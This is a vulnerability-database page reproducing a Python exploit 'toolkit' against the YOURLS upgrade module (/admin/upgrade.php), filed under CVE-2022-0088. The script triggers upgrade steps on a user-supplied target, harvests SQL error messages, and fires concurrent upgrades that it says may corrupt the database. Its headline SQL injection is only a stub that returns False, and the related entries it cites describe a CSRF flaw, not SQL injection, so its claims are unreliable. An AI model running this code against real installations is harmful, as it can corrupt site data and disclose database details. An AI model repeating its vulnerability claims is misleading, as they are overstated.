Vulners
Lucene search
📄 YOURLS 1.8.2 SQL Injection
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | CVE-2022-0088 | 3 Apr 202209:15 | – | attackerkb |
 | CVE-2022-0088 | 3 Dec 202521:02 | – | circl |
 | YOURLS 跨站请求伪造漏洞 | 3 Apr 202200:00 | – | cnnvd |
 | CVE-2022-0088 | 3 Apr 202208:50 | – | cve |
 | CVE-2022-0088 Cross-Site Request Forgery (CSRF) in yourls/yourls | 3 Apr 202208:50 | – | cvelist |
 | Cross-Site Request Forgery (CSRF) in yourls/yourls | 24 Dec 202108:30 | – | huntr |
 | YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF) | 2 Dec 202500:00 | – | exploitdb |
 | EUVD-2022-1750 | 3 Oct 202520:07 | – | euvd |
 | Cross-Site Request Forgery in YOURLS | 4 Apr 202200:00 | – | github |
 | CVE-2022-0088 | 3 Apr 202209:15 | – | nvd |
10
=============================================================================================================================================
| # Title : YOURLS 1.8.2 SQL Injection & System Compromise in Administrative Upgrade Functions |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/yourls/yourls/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212395/ & CVE-2022-0088
[+] Summary : Critical security vulnerabilities discovered in YOURLS upgrade module (/admin/upgrade.php)
that could allow attackers to execute arbitrary SQL commands, disclose sensitive database information,
and potentially compromise the entire YOURLS installation during upgrade processes.
[+] Vulnerabilities: CSRF, IDOR, Missing Authorization, Missing Input Validation
[+] POC : python poc.py
#!/usr/bin/env python3
import requests
import sys
import time
from urllib.parse import urljoin
class YOURLS_Upgrade_Exploit:
def __init__(self, target_url, session_cookie=None):
self.base_url = target_url.rstrip('/')
self.upgrade_url = urljoin(self.base_url, 'admin/upgrade.php')
self.session = requests.Session()
if session_cookie:
self.session.headers.update({'Cookie': session_cookie})
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 YOURLS Upgrade',
'Accept': 'text/html,application/xhtml+xml',
})
def trigger_upgrade(self, oldver="1.3", newver="1.8"):
"""Trigger upgrade process to exploit vulnerabilities"""
print("[*] Triggering upgrade process...")
params = {
'step': '1',
'oldver': oldver,
'newver': newver,
'oldsql': '100',
'newsql': '506'
}
try:
response = self.session.get(self.upgrade_url, params=params)
if "Updating DB" in response.text or "Updating table structure" in response.text:
print("[+] Upgrade process triggered successfully")
return True
else:
print("[-] Could not trigger upgrade")
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
def sql_injection_upgrade_14(self, sql_payload):
"""Exploit SQL injection in yourls_update_table_to_14()"""
print("[*] Attempting SQL injection during v1.3 to v1.4 upgrade...")
# We need to control $url parameter in the update query
# The vulnerable line: "UPDATE `$table` SET `keyword` = '$newkeyword' WHERE `url` = '$url';"
# First, we need to know a valid URL from the database
# Then inject via that URL
# This is a blind injection - we need to be creative
exploit_url = f"{self.upgrade_url}?step=2&oldver=1.3&newver=1.4&oldsql=100&newsql=200&from=0"
# The attack requires:
# 1. Knowing an existing URL in the database
# 2. Injecting through that URL parameter
# 3. Triggering the update process
print("[!] Note: This requires prior knowledge of database contents")
return False
def exploit_redirect_injection(self, redirect_url):
"""Exploit insecure redirects in upgrade process"""
print("[*] Attempting redirect injection...")
# Craft malicious upgrade parameters
params = {
'step': '3',
'oldver': '1.7',
'newver': '1.8',
'oldsql': '505',
'newsql': '506'
}
# The vulnerable code path:
# yourls_upgrade() → yourls_redirect_javascript() with user-controlled parameters
response = self.session.get(self.upgrade_url, params=params)
# Look for JavaScript redirects
if "location.href" in response.text or "window.location" in response.text:
print("[+] Found JavaScript redirects - potential injection point")
# We need to control the redirect URL
# This would require manipulating upgrade parameters or session
return True
return False
def information_disclosure(self):
"""Trigger error messages to reveal database information"""
print("[*] Triggering information disclosure...")
# Trigger SQL errors by providing invalid parameters
params = {
'step': '1',
'oldver': 'invalid',
'newver': '1.8',
'oldsql': 'invalid',
'newsql': '506'
}
try:
response = self.session.get(self.upgrade_url, params=params)
error_indicators = [
'SQLSTATE',
'MySQL',
'syntax error',
'Duplicate entry',
'database',
'table',
'column'
]
for indicator in error_indicators:
if indicator in response.text:
print(f"[+] Information disclosure: Found '{indicator}' in response")
# Extract error details
lines = response.text.split('\n')
for line in lines:
if indicator in line:
print(f" → {line.strip()[:100]}")
return True
except Exception as e:
print(f"[-] Error: {str(e)}")
return False
def exploit_htaccess_write(self, malicious_content):
"""Attempt to write malicious .htaccess content"""
print("[*] Attempting .htaccess manipulation...")
# The vulnerable function: yourls_clean_htaccess_for_14()
# and yourls_create_htaccess()
# We need to trigger the v1.3 → v1.4 upgrade path
params = {
'step': '1',
'oldver': '1.3',
'newver': '1.4',
'oldsql': '100',
'newsql': '200'
}
response = self.session.get(self.upgrade_url, params=params)
if "htaccess" in response.text.lower():
print("[+] .htaccess manipulation functions triggered")
print("[!] Note: Full exploitation requires file write permissions")
return False
def race_condition_exploit(self):
"""Exploit race conditions during concurrent upgrades"""
print("[*] Testing for race condition vulnerabilities...")
# The upgrade process doesn't prevent concurrent executions
# We can trigger multiple upgrades simultaneously
import threading
def trigger_upgrade_thread():
params = {
'step': '1',
'oldver': '1.7',
'newver': '1.8',
'oldsql': '505',
'newsql': '506'
}
self.session.get(self.upgrade_url, params=params, timeout=30)
# Launch multiple concurrent upgrades
threads = []
for i in range(5):
t = threading.Thread(target=trigger_upgrade_thread)
threads.append(t)
t.start()
print("[+] Launched 5 concurrent upgrade attempts")
print("[!] This could cause database corruption or inconsistent state")
return True
def main():
target = input("Enter target YOURLS URL (e.g., http://example.com): ").strip()
cookie = input("Enter session cookie (optional, press enter to skip): ").strip()
exploit = YOURLS_Upgrade_Exploit(target, cookie if cookie else None)
print("\n" + "="*60)
print("YOURLS Upgrade Module Exploitation Toolkit")
print("="*60 + "\n")
print("Select exploit option:")
print("1. Trigger upgrade process")
print("2. Test for information disclosure")
print("3. Test for race conditions")
print("4. Full vulnerability scan")
print("5. Exit")
choice = input("\nEnter choice (1-5): ").strip()
if choice == '1':
if exploit.trigger_upgrade():
print("[+] Upgrade triggered - check for SQL errors")
elif choice == '2':
exploit.information_disclosure()
elif choice == '3':
exploit.race_condition_exploit()
elif choice == '4':
print("\n[*] Running full vulnerability scan...")
exploit.trigger_upgrade()
time.sleep(2)
exploit.information_disclosure()
time.sleep(1)
exploit.race_condition_exploit()
elif choice == '5':
print("[*] Exiting...")
sys.exit(0)
else:
print("[-] Invalid choice")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 24.3
CVSS 3.17.4
CVSS 33.5
EPSS0.00598